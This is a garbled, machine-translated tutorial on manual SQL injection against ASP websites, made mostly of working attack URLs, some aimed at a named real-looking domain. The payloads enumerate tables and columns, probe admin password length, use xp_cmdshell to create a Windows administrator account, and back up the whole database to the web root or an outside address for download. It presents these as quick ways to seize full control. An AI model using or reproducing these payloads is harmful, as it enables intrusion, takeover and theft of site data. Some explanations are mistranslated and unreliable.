Summary of manual ASP injection script Learning

ACCESS

Query database types
Http://www.zengke.com/product.asp? Sort_id = 24 and exists (select * from sysobjects)

On the admin page of the query table, the query result is displayed as "yes" and the error is "no.
Http://www.zengke.com//product.asp? Sort_id = 24 and exists (select * from admin)

Query the admin entry in the admin table
/Product. asp? Sort_id = 24 and exists (select admin_name from admin)

If the length of the Project admin in the query admin table is less than or equal to error, the system returns normal.
Http://www.zengke.com//product.asp? Sort_id = 24 And (Select Top 1 len (cstr ([pwd]) From (Select Top 1 * From [admin] Where 1 = 1 order by [pwd]) T order by [pwd] desc) <= 7

Brute force cracking: admin_name

SQL

① Http: // Site/url. asp? Id = 1; exec master .. xp_cmdshell "net user name password/add "--

Semicolons (;); In SQLServer, separate the first and second statements, which indicate that the subsequent statements are comments. Therefore, this statement is divided into two statements for execution in SQLServer, first Select the record with ID = 1, and then execute the Stored Procedure xp_mongoshell. This stored procedure is used to call system commands. Therefore, run the "net" command to create a windows account with the username and password, and then:

② Http: // Site/url. asp? Id = 1; exec master .. xp_cmdshell "net localgroup administrators name/add "--

Add the new account name to the Administrator Group. It does not take two minutes. You have obtained the highest system permission! Of course, this method only applies when using sa to connect to the database. Otherwise, you do not have the permission to call xp_mongoshell.

③ Http: // Site/url. asp? Id = 1; and db_name ()> 0

In the preceding example, and user> 0 is used to obtain the connection username. db_name () is another system variable and returns the name of the connected database.

④ Http: // Site/url. asp? Id = 1; backup database name to disk = 'C: inetpubwwwroot. db ';--

This is a tough trick. Back up the database name obtained from ③ and the absolute path exposed by some IIS errors to the Web directory, use HTTP to download the entire database. All administrators and user passwords are displayed at a glance! When you do not know the absolute path, you can back up the network address (such as 202.96.xx.xx2.16.db), but the success rate is not high.

⑤ Http: // Site/url. asp? Id = 1; and (Select Top 1 name from sysobjects where xtype = 'U' and status> 0)> 0

As mentioned above, sysobjects is a system table of SQLServer. It stores all table names, views, constraints, and other objects. xtype = 'U' and status> 0, indicates the name of the table created by the user. The preceding statement extracts the first table name and compares it with 0 to expose the table name with an error message. 2. How can I obtain the name of the third table? Let's leave it to our smart readers.

⑥ Http: // Site/url. asp? Id = 1; and (Select Top 1 col_name (object_id ('table name'), 1) from sysobjects)> 0

After obtaining the table name from ⑤, use object_id ('table name') to obtain the internal ID corresponding to the table name. col_name (table name ID, 1) represents the 1st field names of the table, replace 1 with 2, 3, 4... you can obtain the field names in the table to be guessed one by one.